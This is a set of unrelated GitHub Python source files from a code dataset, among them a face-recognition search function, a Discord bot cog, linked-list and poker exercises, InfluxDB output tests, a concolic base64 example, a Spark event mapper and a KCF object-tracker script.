resolution images.\n        detector_backend (string): set face detector backend as retinaface, mtcnn, opencv, ssd or dlib\n        prog_bar (boolean): enable/disable a progress bar\n\n    Returns:\n        This function returns a pandas data frame. If a list of images is passed to img_path, then it will return a list of pandas data frames.\n    \"\"\"\n\n    tic = time.time()\n\n    img_paths = [img_path]\n\n    # -------------------------------\n\n    if os.path.isdir(db_path):\n\n        if model is None:\n\n            model = build_model()\n            models = {}\n            models['VGG-Face'] = model\n\n        else:  # model != None\n            if not silent: print(\"Already built model is passed\")\n\n            models = {}\n            models['VGG-Face'] = model\n\n        # ---------------------------------------\n\n        model_names = []\n        metric_names = []\n        model_names.append('VGG-Face')\n        metric_names.append(distance_metric)\n\n        # ---------------------------------------\n\n        file_name = \"representations_%s.pkl\" % (\"VGG-Face\")\n        file_name = file_name.replace(\"-\", \"_\").lower()\n\n        if path.exists(db_path + \"/\" + file_name):\n\n            if not silent: print(\"WARNING: Representations for images in \", db_path,\n                                 \" folder were previously stored in \", file_name,\n                                 \". If you added new instances after this file was created, then please delete this file and call find again. It will be recreated.\")\n\n            f = open(db_path + '/' + file_name, 'rb')\n            representations = pickle.load(f)\n\n            if not silent: print(\"There are \", len(representations), \" representations found in \", file_name)\n\n        else:  # create representations.pkl from scratch\n            employees = []\n\n            for r, d, f in os.walk(db_path):  # r=root, d=directories, f=files\n                for file in f:\n                    if ('.jpg' in file.lower()) or ('.png' in file.lower()):\n                        exact_path = r + \"/\" + file\n                        employees.append(exact_path)\n\n            if len(employees) == 0:\n                raise ValueError(\"There is no image in \", db_path,\n                                 \" folder! Validate .jpg or .png files exist in this path.\")\n\n            # ------------------------\n            # find representations for db images\n\n            representations = []\n\n            pbar = tqdm(range(0, len(employees)), desc='Finding representations', disable=not prog_bar)  # show the bar when prog_bar=True\n\n            # for employee in employees:\n            for index in pbar:\n                employee = employees[index]\n\n                instance = []\n                instance.append(employee)\n\n                custom_model = models['VGG-Face']\n\n                representation = represent(img_path=employee,\n                                           model=custom_model,\n                                           enforce_detection=enforce_detection, detector_backend=detector_backend,\n                                           align=align,\n                                           normalization=normalization)\n\n                instance.append(representation)\n\n                # -------------------------------\n\n                representations.append(instance)\n\n            f = open(db_path + '/' + file_name, \"wb\")\n            pickle.dump(representations, f)\n            f.close()\n\n            if not silent: print(\"Representations stored in \", db_path, \"/\", file_name,\n                                 \" file. Please delete this file when you add new identities in your database.\")\n
\n        # ----------------------------\n        # now, we got representations for facial database\n\n        df = pd.DataFrame(representations, columns=[\"identity\", \"%s_representation\" % ('VGG-Face')])\n\n        df_base = df.copy()  # df will be filtered for each img. we will restore it for the next item.\n\n        resp_obj = []\n\n        global_pbar = tqdm(range(0, len(img_paths)), desc='Analyzing', disable=not prog_bar)\n        for j in global_pbar:\n            img_path = img_paths[j]\n\n            # find representation for passed image\n\n            custom_model = models['VGG-Face']\n\n            target_representation = represent(img_path=img_path,\n                                              model=custom_model,\n                                              enforce_detection=enforce_detection,\n                                              detector_backend=detector_backend,\n                                              align=align,\n                                              normalization=normalization)\n\n            for k in metric_names:\n                distances = []\n                for index, instance in df.iterrows():\n                    source_representation = instance[\"%s_representation\" % ('VGG-Face')]\n\n                    if k == 'cosine':\n                        distance = dst.findCosineDistance(source_representation, target_representation)\n                    elif k == 'euclidean':\n                        distance = dst.findEuclideanDistance(source_representation, target_representation)\n                    elif k == 'euclidean_l2':\n                        distance = dst.findEuclideanDistance(dst.l2_normalize(source_representation),\n                                                             dst.l2_normalize(target_representation))\n\n                    distances.append(distance)\n\n                # ---------------------------\n\n                df[\"%s_%s\" % ('VGG-Face', k)] = distances\n\n                threshold = dst.findThreshold('VGG-Face', k)\n                df = df.drop(columns=[\"%s_representation\" % ('VGG-Face')])\n                df = df[df[\"%s_%s\" % ('VGG-Face', k)] <= threshold]\n\n                df = df.sort_values(by=[\"%s_%s\" % ('VGG-Face', k)], ascending=True).reset_index(drop=True)\n\n                resp_obj.append(df)\n                df = df_base.copy()  # restore df for the next iteration\n\n        # ----------------------------------\n\n        toc = time.time()\n\n        if not silent: print(\"find function lasts \", toc - tic, \" seconds\")\n\n        if len(resp_obj) == 1:\n            return resp_obj[0]\n\n        return resp_obj\n\n    else:\n        raise ValueError(\"Passed db_path does not exist!\")\n\n    return None\n","repo_name":"alaeddinehamroun/face_recognition","sub_path":"facerecognition.py","file_name":"facerecognition.py","file_ext":"py","file_size_in_byte":14894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"2810314848","text":"import discord\r\nfrom discord.ext import commands,tasks\r\nimport random\r\nimport requests\r\nimport json\r\nimport asyncio\r\nimport itertools\r\n\r\n\r\nclass Server(commands.Cog):\r\n    def __init__(self,bot):\r\n        self.bot=bot\r\n\r\n    @commands.command()\r\n    async def mention(self,ctx, user : discord.Member):\r\n        await ctx.send(user.mention)\r\n\r\n    @commands.command(aliases=[\"info\",\"details\"])\r\n    async def whois(self,ctx, member : discord.Member = None):\r\n        if not member:\r\n            member = ctx.author\r\n        embed=discord.Embed(title=member.name,description=member.mention,color=discord.Colour.red())\r\n        embed.add_field(name=\"ID\",value=member.id,inline=False)\r\n        embed.set_thumbnail(url=member.avatar_url)\r\n        await ctx.send(embed=embed)\r\n\r\n    @commands.command(aliases=[\"getprofilepic\",\"dp\"])\r\n    async def getdp(self,ctx, member: discord.Member = None):\r\n        if not member:\r\n            member = ctx.author\r\n        await ctx.send(member.avatar_url)\r\n\r\n    @commands.command(aliases=[\"dm\",\"pvtmessage\"])\r\n    async def pm(self,ctx, member: discord.Member = None,*,text):\r\n        if not member:\r\n            member = ctx.author\r\n        await member.send(text)\r\n
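\r\n    # NOTE: purge(limit=amount + 1) below deletes one extra message so the\r\n    # invoking command message is removed along with `amount` ordinary ones.\r\n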
    @commands.command(aliases=[\"clean\"])\r\n    @commands.has_permissions(manage_messages=True)\r\n    async def clear(self,ctx,amount=1):\r\n        await ctx.channel.purge(limit=amount+1)\r\n\r\n    @commands.command()\r\n    @commands.has_permissions(administrator=True)\r\n    async def spam(self,ctx, times,*,text):\r\n        if int(times)>20:\r\n            times=20\r\n            await ctx.send(ctx.author.mention+\" sorry but spam command is limited to 20\")\r\n        for i in range(int(times)):\r\n            await ctx.send(text)\r\n\r\n    @commands.command()\r\n    async def ping(self,ctx):\r\n        await ctx.send(f'Pong! {round(self.bot.latency *1000)}ms')\r\n\r\n    @commands.command()\r\n    async def server(self,ctx):\r\n        name=str(ctx.guild.name)\r\n        description=str(ctx.guild.description)\r\n        owner=str(ctx.guild.owner)\r\n        _id = str(ctx.guild.id)\r\n        region=str(ctx.guild.region)\r\n        memcount=str(ctx.guild.member_count)\r\n        icon = str(ctx.guild.icon_url)\r\n\r\n        embed=discord.Embed(\r\n            title=name +\" Server Information\",\r\n            description=description,\r\n            color=discord.Color.blue()\r\n        )\r\n        embed.set_thumbnail(url=icon)\r\n        embed.add_field(name=\"Owner\",value=owner,inline=True)\r\n        embed.add_field(name=\"Server Id\",value=_id,inline=True)\r\n        embed.add_field(name=\"Region\",value=region,inline=True)\r\n        embed.add_field(name=\"Member Count\",value=memcount,inline=True)\r\n\r\n        await ctx.send(embed=embed)\r\n\r\n    @commands.command()\r\n    @commands.has_permissions(administrator=True)\r\n    async def newrole(self,ctx, *, rolename=None):\r\n        if not rolename:\r\n            await ctx.send(\"You forgot to provide a name!\")\r\n        else:\r\n            role = await ctx.guild.create_role(name=rolename, mentionable=True)\r\n            await ctx.author.add_roles(role)\r\n            await ctx.send(f\"Successfully created and assigned {role.mention}!\")\r\n\r\n\r\n    ## DO NOT USE THIS: anyone in the server could assign themselves any role\r\n    ##@commands.command()\r\n    ##async def takerole(self,ctx,*,rolename=None):\r\n    ##    if not rolename:\r\n    ##        await ctx.send(\"You forgot to provide a name!\")\r\n    ##    else:\r\n    ##        role = discord.utils.get(ctx.author.guild.roles,name=rolename)\r\n    ##        await ctx.author.add_roles(role)\r\n    ##        await ctx.send(f\"Successfully assigned {ctx.author.mention} to {rolename}!\")\r\n\r\n    @commands.command()\r\n    @commands.has_permissions(administrator=True)\r\n    async def giverole(self,ctx,member : discord.Member = None,*,rolename=None):\r\n        if not member:\r\n            member = ctx.author\r\n        if not rolename:\r\n            await ctx.send(\"You forgot to provide a name of role!\")\r\n        else:\r\n            role = discord.utils.get(member.guild.roles,name=rolename)\r\n            await member.add_roles(role)\r\n            await ctx.send(f\"Successfully assigned {member.mention} to {rolename}!\")\r\n\r\ndef setup(bot):\r\n    bot.add_cog(Server(bot))\r\n","repo_name":"Mastermind-sap/joker","sub_path":"cogs/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4210,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"}
+{"seq_id":"9939678248","text":"class Node:\r\n    def __init__(self, data):\r\n        self.data = data\r\n        self.next = None\r\nclass LinkedList:\r\n    def __init__(self):\r\n        self.head = None\r\n    def insert(self, data):\r\n        new_node = Node(data)\r\n        if not self.head:\r\n            self.head = new_node\r\n        else:\r\n            current = self.head\r\n            while current.next:\r\n                current = current.next\r\n            current.next = new_node\r\n    @staticmethod\r\n    def merge(list1, list2):\r\n        merged_list = LinkedList()\r\n        current1 = list1.head\r\n        current2 = list2.head\r\n        while current1 and current2:\r\n            if current1.data < current2.data:  # was current2 < current2, which is always False\r\n                merged_list.insert(current1.data)\r\n                current1 = current1.next\r\n            else:\r\n                merged_list.insert(current2.data)  # was current1.data, which dropped list2's values\r\n                current2 = current2.next\r\n        while current1:\r\n            merged_list.insert(current1.data)\r\n            current1 = current1.next\r\n        while current2:\r\n            merged_list.insert(current2.data)\r\n            current2 = current2.next\r\n        return merged_list\r\n    def sort(self):\r\n        if not self.head or not self.head.next:\r\n            return\r\n        current = self.head\r\n        while current:\r\n            index = current.next\r\n            while index:\r\n                if current.data > index.data:\r\n                    current.data, index.data = index.data, current.data\r\n                index = index.next\r\n            current = current.next\r\n\r\n    def display(self):\r\n        current = self.head\r\n        while current:\r\n            print(current.data, end=\"->\")\r\n            current = current.next\r\n        print(\"null\")\r\n\r\n\r\nlist1 = LinkedList()\r\nlist1.insert(25)\r\nlist1.insert(35)\r\nlist1.insert(12)\r\nlist1.insert(4)\r\nlist1.insert(36)\r\nlist1.insert(48)\r\n\r\nlist2 = LinkedList()\r\nlist2.insert(8)\r\nlist2.insert(32)\r\nlist2.insert(22)\r\nlist2.insert(45)\r\nlist2.insert(63)\r\nlist2.insert(49)\r\n\r\nprint(\"Linked-List-1:\")\r\nlist1.display()\r\nprint(\"Linked-List-2:\")\r\nlist2.display()\r\n\r\nmerged_list = LinkedList.merge(list1, list2)\r\nmerged_list.sort()\r\nprint(\"Merged-Sorted-List:\")\r\nmerged_list.display()\r\n\r\n","repo_name":"marepallik/javahackerrankassign","sub_path":"merge n sort.py","file_name":"merge n sort.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"27616391853","text":"# -*- coding:utf-8 -*-\n__author__ = 'ShawDa'\n\n\nclass Solution:\n    def IsContinuous(self, numbers):\n        # write code here\n        # A straight needs: exactly 5 cards; no duplicates apart from 0s (jokers);\n        # and max - min over the non-zero cards at most 4.\n        if len(numbers) != 5:\n            return False\n        num_dict, min_num, max_num = {}, 14, -1\n        for num in numbers:\n            if num == 0:\n                continue\n            if num in num_dict:\n                return False\n            else:\n                num_dict[num] = 1\n            if num > max_num:\n                max_num = num\n            if num < min_num:\n                min_num = num\n        if max_num - min_num <= 4:\n            return True\n        else:\n            return False\n","repo_name":"ShawDa/Coding","sub_path":"coding-interviews/45扑克牌顺子.py","file_name":"45扑克牌顺子.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"7640653605","text":"from typing import Tuple\nfrom unittest.mock import Mock, patch\n\nimport pytest\nfrom psycopg2.extensions import connection as Connection\n\nimport pgflux.core as core\nimport pgflux.output.http as http\nfrom pgflux.enums import Precision\nfrom pgflux.exc import PgFluxException\nfrom pgflux.output import HTTPSOutput, Output\n\n\n@pytest.fixture\ndef mock_http_connection() -> Tuple[Mock, http.HTTPOutput]:\n    def fake_getenv(key: str, fallback: str) -> str:\n        test_data = {\n            \"PGFLUX_INFLUX_HOST\": \"fake-host\",\n            \"PGFLUX_INFLUX_USERNAME\": \"fake-username\",\n            \"PGFLUX_INFLUX_PASSWORD\": \"fake-password\",\n            \"PGFLUX_INFLUX_DBNAME\": \"fake-db-name\",\n        }\n        return test_data.get(key, fallback)\n\n    with patch(\"pgflux.output.http.getenv\") as getenv:\n        getenv.side_effect = fake_getenv\n        instance = http.HTTPOutput()\n        instance.CONNECTION_CLASS = Mock()  # type: ignore\n        fake_connection = Mock(name=\"fake-connection\")\n        instance.CONNECTION_CLASS.return_value = fake_connection\n        yield fake_connection, instance  # type: ignore\n\n
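\n# The fixture above stubs both the environment lookup and the HTTP connection\n# class, so the tests below exercise HTTPOutput without real network access.\n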
\ndef test_http_output():\n    mock_output = Mock()\n    mock_output.PRECISION = Precision.SECONDS\n    with core.connect() as db_connection:\n        db_connection: Connection\n        core.execute_query(\n            db_connection, \"cluster:connections\", [], mock_output\n        )\n    mock_output.send.assert_called()  # type: ignore\n\n\ndef test_factory():\n    instance = Output.create(\"https\")\n    assert isinstance(instance, HTTPSOutput)\n\n\ndef test_http_send_to_influx():\n    mock_connection = Mock()\n    mock_response = Mock(status=204)\n    mock_connection.getresponse.return_value = mock_response  # type: ignore\n    response = http.send_to_influx(\n        mock_connection, {\"Foo\": \"Bar\"}, {\"frob\": \"nix\"}, \"the-payload\"\n    )\n    mock_connection.request.assert_called_with(  # type: ignore\n        \"POST\", \"/write?frob=nix\", \"the-payload\", {\"Foo\": \"Bar\"}\n    )\n    assert response is mock_response\n\n\ndef test_http_send_to_influx_error():\n    mock_connection = Mock()\n    mock_response = Mock(status=500)\n    mock_connection.getresponse.return_value = mock_response  # type: ignore\n    with pytest.raises(PgFluxException):\n        http.send_to_influx(\n            mock_connection, {\"Foo\": \"Bar\"}, {\"frob\": \"nix\"}, \"the-payload\"\n        )\n\n\ndef test_http_connect(mock_http_connection: Tuple[Mock, http.HTTPOutput]):\n\n    fake_connection, http_output = mock_http_connection\n\n    with http_output.connect() as connection:\n        conn, headers, params = connection\n        assert conn is fake_connection\n        assert headers == {\n            \"Content-Type\": \"text/plain\",\n            \"Authorization\": \"BASIC ZmFrZS11c2VybmFtZTpmYWtlLXBhc3N3b3Jk\",\n        }\n        assert params == {\n            \"db\": \"fake-db-name\",\n            \"precision\": \"s\",\n        }\n    fake_connection.close.assert_called()  # type: ignore\n\n\ndef test_http_send_flush(mock_http_connection: Tuple[Mock, http.HTTPOutput]):\n\n    fake_connection, http_output = mock_http_connection\n    fake_connection.getresponse.return_value = Mock(status=204)  # type: ignore\n    http_output.send(\"hello-world\")\n    http_output.send(\"hello-world2\")\n    http_output.flush()\n    fake_connection.request.assert_called_with(  # type: ignore\n        \"POST\",\n        \"/write?db=fake-db-name&precision=s\",\n        \"hello-world\\nhello-world2\",\n        {\n            \"Content-Type\": \"text/plain\",\n            \"Authorization\": \"BASIC ZmFrZS11c2VybmFtZTpmYWtlLXBhc3N3b3Jk\",\n        },\n    )\n","repo_name":"post-luxembourg/pgflux","sub_path":"tests/test_outputs.py","file_name":"test_outputs.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
+{"seq_id":"21979642212","text":"\n# def is_leap(year):\n#     a = year%4\n#     b = year%100\n#     c = year%400\n#     print(a)\n#     if a==0:\n#         if b==0 : \n#             if c!=0: return False\n#             else: return True \n        \n#         else: return True\n#     else:\n#         return False\n\n\n# year=int(input())\n# print(is_leap(year))\n\n\n\n'''\nfor i in range(5):\n    print(i)\n    \n'''\n\n\n\n# def func(n):\n#     i=1\n#     while i <= n :\n#         print (i)\n#         i = i+1\n    \n\n# n = 5\n# l1=(func(n))\n# print(l1)\n#\n\n\n\n\ndef fuc(n):\n    # iterate over a range: `for i in n` raised TypeError because n is an int\n    for i in range(1, n + 1):\n        print(i)\n\nn = 5\nfuc(n)\n","repo_name":"Anurag127001/CWH_Python","sub_path":"Hacker rank practice sets/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"35456361982","text":"import random\n\nroll = 0\ncount = 0\n\nprint('First person to roll a 5 wins!')\n\nwhile roll != 5:\n\n    name = input('Enter a name, or \\'q\\' to quit: ')\n    if name.strip() == '':\n        continue  # skip to top\n\n    if name.strip() == 'q':\n        break  # ends the loop\n\n    count = count + 1\n    roll = random.randint(1, 5)\n    print(f'{name} rolled {roll}')\nelse:  # runs only when the while condition turns false\n    print(f'{name} 
Wins!!!')\n\nprint(f'You rolled the dice {count} times.')","repo_name":"kattagarian/learning","sub_path":"python-beginner-ms/python-while/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3698690131","text":"#!/usr/bin/env python3\n\nfrom concolic import *\n\n## THIS IMPLEMENTATION OF `byte_encode` DOES NOT WORK!\n## We will lose the symbolic part of concolic values.\n##\n## BYTES = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\n##\n## def byte_encode(x):\n## return ord(BYTES[x])\n\ndef byte_encode(x):\n if x < 26:\n return x + ord('A')\n elif x < 52:\n return x - 26 + ord('a')\n elif x < 62:\n return x - 52 + ord('0')\n elif x < 63:\n return ord('+')\n elif x < 64:\n return ord('/')\n raise Exception(\"Never be here\")\n\ndef base64_encode(data):\n length = len(data)\n output = [ord('=')] * ((length + 2) // 3 * 4)\n ptr, i = 0, 0\n\n while len(data) >= 3:\n first, second, third = data[:3]\n data = data[3:]\n\n n = first << 16 | second << 8 | third\n output[ptr], ptr = byte_encode((n >> 18) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 12) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 6) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 0) & 63), ptr + 1\n\n if len(data) == 1:\n n = data[0] << 16\n output[ptr], ptr = byte_encode((n >> 18) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 12) & 63), ptr + 1\n elif len(data) == 2:\n n = data[0] << 16 | data[1] << 8\n output[ptr], ptr = byte_encode((n >> 18) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 12) & 63), ptr + 1\n output[ptr], ptr = byte_encode((n >> 6) & 63), ptr + 1\n\n return output\n\ndef test_me():\n data = [mk_int(chr(i + ord('a'))) for i in range(6)]\n\n ## assume all input characters are visible.\n def assume_ok(data):\n for x in data:\n if x < 0x20 or x > 0x7e:\n return False\n return True\n\n def bytes_equal(xs, ys):\n if len(xs) != len(ys):\n return False\n for x, y in zip(xs, ys):\n if x != ord(y):\n return False\n return True\n\n if assume_ok(data):\n if bytes_equal(base64_encode(data), \"aDFiYWJ5\"):\n ## 679 rounds of iteration to trigger this assertion.\n ## [679] a = 0x68, b = 0x31, c = 0x62, d = 0x61, e = 0x62, f = 0x79\n assert False, \"reach me\"\n\n## heuristic to prioritize the path leads to `assert False`.\n##\n## this heuristic is based on some observations from the code. 
To expose\n## `assert False`, we need to pass all checks in bytes_equal, so we give\n## path with equality a positive score, while inequality a high negative\n## score.\ndef eval_pc(pc):\n goodness = 0\n for i in pc:\n assert isinstance(i, ast_eq)\n i, v = i.a, i.b\n if isinstance(i, ast_eq):\n if v.b:\n goodness += 100\n else:\n goodness -= 1000\n else:\n goodness -= 1\n return goodness\n\nif __name__ == \"__main__\":\n concolic(test_me, eval_pc=eval_pc)\n","repo_name":"foreverbell/mini-symex","sub_path":"src/test_base64.py","file_name":"test_base64.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"74106607272","text":"# Name: - nest_event_mapping_replace\n# Input:- events weight mapping using replace function\n# Description: - Function to apply event weights mapping\n# calling :- df=nest_event_mapping_replace(\"df\")\n\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.feature import StringIndexer\nfrom pyspark.sql.functions import col\n\nfrom nest_recom_default_weights import (\n\tEVENTS_WEIGHT, \n\tDEFAULT_WEIGHT\n\t)\n\ndef map_weights(data,sc,sqlContext):\n \n data.registerTempTable(\"table\")\n\n df=sqlContext.sql(\"select userId,\" \n \t\t\t\t\t\t+ \" substr(context.page.path,11,length(context.page.path)) as propertyId,\"\n \t\t\t\t\t\t+ \" event as weight\" \n\t\t\t\t\t\t\t+ \" from table\"\n\t\t\t\t\t\t\t+ \" where userId is not null\"\n\t\t\t\t\t\t\t+ \" and event in\" \n\t\t\t\t\t\t\t+ \" (\"\n\t\t\t\t\t\t\t+ \" 'ScheduleVisit',\"\n\t\t\t\t\t\t\t+ \" 'Unfavorited',\"\n\t\t\t\t\t\t\t+ \" 'PhotoClicked',\"\n\t\t\t\t\t\t\t+ \" 'CalculateClicked',\"\n\t\t\t\t\t\t\t+ \" 'MortgageCalculatorCTAClicked',\"\n\t\t\t\t\t\t\t+ \" 'ContactPartnerClicked',\"\n\t\t\t\t\t\t\t+ \" 'RequestInformationClicked',\"\n\t\t\t\t\t\t\t+ \" 'SimilarPropertyClicked',\"\n\t\t\t\t\t\t\t+ \" 'PartnerBanner',\"\n\t\t\t\t\t\t\t+ \" 'MapPinClicked',\"\n\t\t\t\t\t\t\t+ \" 'CallClicked',\"\n\t\t\t\t\t\t\t+ \" 'Prop-page-email',\"\n\t\t\t\t\t\t\t+ \" 'ChatClicked',\"\n\t\t\t\t\t\t\t+ \" 'AgentCall',\"\n\t\t\t\t\t\t\t+ \" 'AgentEmail',\"\n\t\t\t\t\t\t\t+ \" 'ComponentTriggered'\"\n\t\t\t\t\t\t\t+ \" )\" \n\t\t\t\t\t\t\t+ \" order by userId\")\n \t\n # file_name=\"UserEvents/events_mapping.json\"\n # events_mapping=sqlContext.read.json(file_name)\n # events=sc.textfile(events.txt)\n\n \n\n # give weights to each event\n df2 = df.replace(to_replace=EVENTS_WEIGHT, subset=['weight'])\n \n\n # weighted average\n df3 = df2.groupBy(\"userId\",\"propertyId\") \\\n \t\t .agg({'weight':'avg'}) \\\n \t\t .withColumnRenamed('avg(weight)', 'weight') \\\n \t\t .fillna({'weight':DEFAULT_WEIGHT})\n\n \n # fill null with default weight\n #df5 = df4.fillna({'weight':DEFAULT_WEIGHT})\n #df6 = df5.na.drop()\n \n \n\n return df3\n\ndef numeric_conversion(data):\n indexers = [StringIndexer(inputCol=column, outputCol=\"new_\"+column).fit(data) for column in list(set(data.columns)-set(['weight'])) ]\n pipeline = Pipeline(stages=indexers)\n df_r = pipeline.fit(data).transform(data)\n \n df_r = df_r.withColumn(\"new_userId\", col(\"new_userId\").cast(\"int\"))\n df_r = df_r.withColumn(\"new_propertyId\", col(\"new_propertyId\").cast(\"int\"))\n df_r = df_r.withColumn(\"weight\", col(\"weight\").cast(\"int\"))\n \n \n ## TBD\n df_r = df_r.filter(df_r[\"new_propertyId\"]!=0)\n \n \n return df_r\n \n '''\n stringIndexer = StringIndexer(inputCol=\"userId\", outputCol=\"new_userId\")\n model = stringIndexer.fit(sql_data)\n df_spark_index = 
model.transform(sql_data).withColumn(\"new_userId\", col(\"new_userId\").cast(\"int\"))\n    df_spark_index.show()\n    \n    # Convert into numerical IDs\n    data['new_userId'] = data['userId'].astype(\"category\").cat.codes\n    data['new_propertyId'] = data['propertyId'].astype(\"category\").cat.codes\n\n    # Create a lookup frame so we can get the propertyId names back in \n    # readable form later.\n    item_lookup = data[['new_propertyId', 'propertyId']].drop_duplicates()\n    item_lookup['new_propertyId'] = item_lookup.new_propertyId.astype(str)\n\n    data = data.drop(['user', 'propertyId'], axis=1)\n\n    # Drop any rows that have 0 weight\n    data = data.loc[data.weight != 0]\n\n    # Create lists of all users, properties and weights\n    users = list(np.sort(data.new_userId.unique()))\n    artists = list(np.sort(data.new_propertyId.unique()))\n    weight = list(data.weight)\n\n    # Get the rows and columns for our new matrix\n    rows = data.new_userId.astype(int)\n    cols = data.new_propertyId.astype(int)\n\n    '''\n    \n\n","repo_name":"jmalhot/Collaborative-Filtering-ALS","sub_path":"nest_recom_event_mapper.py","file_name":"nest_recom_event_mapper.py","file_ext":"py","file_size_in_byte":3644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"12658810946","text":"# old version = 8.12\nimport cv2\nfrom tracker import KCFTracker\n\nenv = 'MAC'\ntest = 'BenchMark'  # 'Cam'\n\nif env == 'MAC':\n\ttest_seq = '/Users/apple/Downloads/cnnKCF_proj_code/KCF_8.12/Sequence/Boy/'\nelif env == 'WIN':\n\ttest_seq = 'Sequence\\\\Boy\\\\'\n\n# get IoU of track_bbox and truth_bbox\ndef IoU(box1, box2):  # 2D bounding box [top, left, bottom, right]\n\tin_h = min(box1[2], box2[2]) - max(box1[0], box2[0])\n\tin_w = min(box1[3], box2[3]) - max(box1[1], box2[1])\n\tinter = 0 if in_h<0 or in_w<0 else in_h*in_w\n\tunion = (box1[2] - box1[0]) * (box1[3] - box1[1]) + (box2[2] - box2[0]) * (box2[3] - box2[1])\n\tunion -= inter\n\tiou = inter / union\n\treturn iou\n\n# read groundtruth_rect.txt from seq_file to get bbox\ndef read_groundtruth(seq_path):\n\ttruth_bbox = []\n\twith open(seq_path+'groundtruth_rect.txt', 'r') as file_to_read:\n\t\twhile True:\n\t\t\tlines = file_to_read.readline()  # read one whole line of data\n\t\t\tif not lines:\n\t\t\t\tbreak\n\t\t\tp_tmp = [int(i) for i in lines.split(',')]\n\t\t\tp_tmp = tuple(p_tmp)\n\t\t\ttruth_bbox.append(p_tmp)\n\treturn truth_bbox\n\n\ndef run_tracker(frame, truth_bbox, seq_val=True):\n\t# KCF tracker use (hog, fixed_Window, multi_scale, cnn)\n\ttracker = KCFTracker(False, True, False, True)\n\tcount = 1\n\tif seq_val == False:\n\t\tcam = cv2.VideoCapture(0)\n\t\ttracker.init(truth_bbox, frame)\n\telif seq_val == True:\n\t\ttracker.init(truth_bbox[0], frame)\n\t\tframe_num = len(truth_bbox)\n\n\twhile True:\n\t\tif seq_val == False:\n\t\t\tok, frame = cam.read()\n\t\t\tif ok == False: break\n\t\telif seq_val == True:\n\t\t\tcount += 1\n\t\t\tif count > frame_num: break\n\t\t\t# read img from seq_file\n\t\t\tif count < 10:\n\t\t\t\timg_path = test_seq + 'img/000'+str(count)+'.jpg'\n\t\t\telif count < 100:\n\t\t\t\timg_path = test_seq + 'img/00' +str(count)+'.jpg'\n\t\t\telse:\n\t\t\t\timg_path = test_seq + 'img/0' +str(count)+'.jpg'\n\t\t\tframe = cv2.imread(img_path)\n\n\t\ttimer = cv2.getTickCount()\n\t\tbbox = tracker.update(frame)\n\t\tbbox = list(map(int, bbox))\n\t\tfps = cv2.getTickFrequency() / (cv2.getTickCount() - timer)\n\n\t\t# Tracking success\n\t\tp1 = (int(bbox[0]), int(bbox[1]))  # top,left\n\t\tp2 = (int(bbox[0] + bbox[2]), int(bbox[1] + bbox[3]))  # 
top+x,left+y = bottom,right\n\t\t# draw tracking result\n\t\tcv2.rectangle(frame, p1, p2, (255, 0, 0), 2, 1)\n\t\tif seq_val == True:\n\t\t\tt1 = (int(truth_bbox[count-1][0]), int(truth_bbox[count-1][1]))\n\t\t\tt2 = (int(truth_bbox[count-1][0] + truth_bbox[count-1][2]), int(truth_bbox[count-1][1] + truth_bbox[count-1][3]))\n\t\t\t# draw ground_truth bbox\n\t\t\tcv2.rectangle(frame, t1, t2, (0, 255, 0), 2, 1)\n\t\t\t# get center of ground_truth bbox, get displacement!!\n\t\t\ttcx = truth_bbox[count-1][0] + truth_bbox[count-1][2] /2.0\n\t\t\ttcy = truth_bbox[count-1][1] + truth_bbox[count-1][3] /2.0\n\t\t\ttcx_pre = truth_bbox[count-2][0] + truth_bbox[count-2][2] /2.0\n\t\t\ttcy_pre = truth_bbox[count-2][1] + truth_bbox[count-2][3] /2.0\n\t\t\tprint('ground_truth:',tcx,tcy,'prev:',tcx_pre,tcy_pre,' ; displacement:', tcx-tcx_pre,tcy-tcy_pre)\n\t\t\t\n\t\t\t# using re_init when tracking failed, IoU<=0.5\n\t\t\t#box1,box2 = [p1[0],p1[1],p2[0],p2[1]], [t1[0],t1[1],t2[0],t2[1]]\n\t\t\t#if IoU(box1,box2) <= 0.5:\n\t\t\t#\ttracker.init(truth_bbox[count-1], frame)\n\t\t\t#\tprint('###########\\nTrack Fail in frame',count,'\\nRe_init KCF\\n###########!')\n\t\t\n\t\t# Put FPS\n\t\tcv2.putText(frame, \"FPS : \" + str(int(fps)), (100, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2)\n\n\t\tcv2.imshow(\"Tracking\", frame)\n\n\t\t# Exit if ESC pressed\n\t\tk = cv2.waitKey(1) & 0xff\n\t\tif k == 27:\n\t\t\tbreak\n\t\n\tif seq_val == False:\n\t\tcam.release()\n\tcv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n\tif test == 'CAM':\n\t\tvideo = cv2.VideoCapture(0)\n\t\tok, frame = video.read()\n\t\tprint(ok, frame.shape)\n\t\t# cv2.selectROI to get init bbox on frame(0)\n\t\tbbox = cv2.selectROI('Select ROI', frame, False)\n\t\tif min(bbox) == 0: exit(0)\n\t\t# run with 